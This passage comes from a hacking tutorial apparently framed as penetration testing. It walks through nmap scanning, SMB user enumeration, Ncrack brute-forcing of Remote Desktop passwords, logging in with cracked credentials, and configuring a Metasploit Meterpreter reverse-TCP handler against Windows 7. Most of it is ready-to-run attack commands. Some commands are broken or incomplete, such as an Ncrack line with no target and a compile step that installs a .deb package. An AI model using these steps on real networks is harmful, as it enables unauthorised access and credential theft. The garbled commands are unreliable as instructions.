Also check ports 25 (SMTP), 110 (POP3), and 143 (IMAP) to identify the presence of eMail servers.

Check for ports 139,445, and 6000 are an effort to identify the operating system of the target. Ports 139 and 445 are typical Windows ports (for NT and 2000/XP, respectively), and port 6000 is a typical UNIX port (the X11 service). Identifying the target’s operating system is a large step in the direction of compromising the target because potential avenues of attack and known vulnerabilities can be explored.

To identify the operating system you can also run an nmap OS detection scan:
nmap -O -v -oversiondetect.txt X.X.X.1-254

Once you had identified port 25 (SMTP) as being open, attempt to identify the version of the application by making a Telnet connection to the port:
telnet target_IP_address 25

You can also tun netcat to grab application/service banner:
nc www.targethost.com 25

The banner presented during the connection process will generally reveal all the information necessary. There are many applications for capturing application banners, including the freeware tools netcat, MingSweeper and Fport for Windows, BannerGrab and various banner grabbers at packetstormsecurity.org.

5.3 Auditing Remote Desktop Passwords with NMAP and Ncrack

The Remote Desktop Protocol could be a possible way to break into a system during a penetration test.

Use Nmap to scan again the target network to check the hosts up and running and to put the in the specified ouput file only the IP address extracted from the results:
nmap -sP X.X.X.1-254 | grep -Eo ‘([0-9]{1,3}\.){3}[0-9]{1,3}’ >> hosts_list.txt

Run a Nmap fast scan on the active hosts by using as target the hosts list generated by the previous command:
nmap -F –iL hosts_list.txt

We can also run additional scans as cross-checks to search for open RDP ports on the network and on active servers:
nmap -p 3389 X.X.X.1-254
nmap –v -F –iL hosts_list.txt -p 3389

Once we found Microsoft Terminal Services (ms-term-serv) running, we need to compile a list of valid usernames to brute-force the passwords in the following steps.
We can use some usernames wordlists such as those you can download from these sites:
or we can make use of social engineering to find the names of IT staff people for example on LinkedIn or on Facebook to guess the username based on the naming convention of the Company or based on the eMail addresses or, again, we can use Nmap to identify a SMB server in the target network:
nmap -v -p445 X.X.X.1-254
nmap -v –p U:137,T:139 X.X.X.1-254
nmap -sS -O X.X.X.1-254 -p 139,445

then to identify the SMB server informations by using the smb-os-discovery.nse NSE script:
nmap –script smb-os-discovery.nse -p445 X.X.X.1-254
nmap -sU -sS –script smb-os-discovery.nse -p U:137,T:139 X.X.X.1-254
nmblookup -A
smbclient //servername-dt/share -I <host> -N

and then to enumerate Windows users through SMB by using the smb-enum-users.nse NSE script:
nmap –script smb-enum-users.nse -p445 <host>
nmap -sU -sS –script smb-enum-users.nse -p U:137,T:139 <host>

So, in the end, let’s assume we have a users.txt text file with such kind of content:

We also need a wordlist.txt file containing a list of passwords one per line (as for the users.txt file): you can download password dictionaries and wordlists files from the links listed above.

Download the latest Ncrack version for your operating system and install it.
You can install binaries or you can compile it from sources on a Linux OS.
If you want to compile it from sources, then download the .tgz file from the above link, create the /usr/local/share/ncrack directory, move the compressed tarball into the directory, decompress it, access the subdirectory created by the tarball decompression, configure, compile and install Ncrack:

mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
dpkg -i ncrack_0.4ALPHA-1_i386.deb

Run Ncrack against the Terminal Server hosts (one at time) by passing to it the users.txt file and the wordlist.txt file (change the target IP address according to your environment):
ncrack -vv -U users.txt -P wordlist.txt,CL=1

The Ncrack output will show wether the usernames are valid and which of them, and it will also show that we can crack the login credentials as the passwords for these users are weak.
We can also see in the output which user has restrictions on the host and which has more privileges (such as the permission to interactive logon the server).
So, by using the credentials of the users having the right to logon the server, we try to access the host: to do this we use a Remote Desktop Client – on Windows we can use the Microsoft Remote Desktop Connection client, on Linux Terminal Server Client, Rdesktop, Remmina (my favourite for the number of protocols supported and the features available) or PAC Manager, on Solaris Rdesktop, on Mac the Microsoft Remote Desktop Connection for Mac, CoRD,

You can start the client and using the GUI by double-clicking its icon or from the command line, for example, by using Microsoft Remote Desktop Connection client on Windows:
%SystemRoot%\System32\mstsc.exe -v

OR by using Rdesktop:
rdesktop -d domain -u username -p password -k en-us -a 16 -z -g 1024×768 -5 -P

OR by using the default remote desktop client on Mac:
open rdp://jsmith:[email protected]

Once the connection opens up and we logon the host, we’re in.

5.4 Hacking Windows 7 with NMAP and Metasploit

Run a Nmap stealth scan on the target network
nmap -sS -v -PN 192.168.1-255

Start the exploit handler:
use exploit/multi/handler

Set the attacker IP address and port:
set LPORT 5555

Set the reverse TCP packet payload:
set payload windows/meterpreter/reverse_tcp

Setup session options:
show options
set EndOnSession false
show options

Specify the target host IP address and port:
set RHOST 192.xx.xx.xx
set RPORT 4321

Check the settings and start exploiting:
show options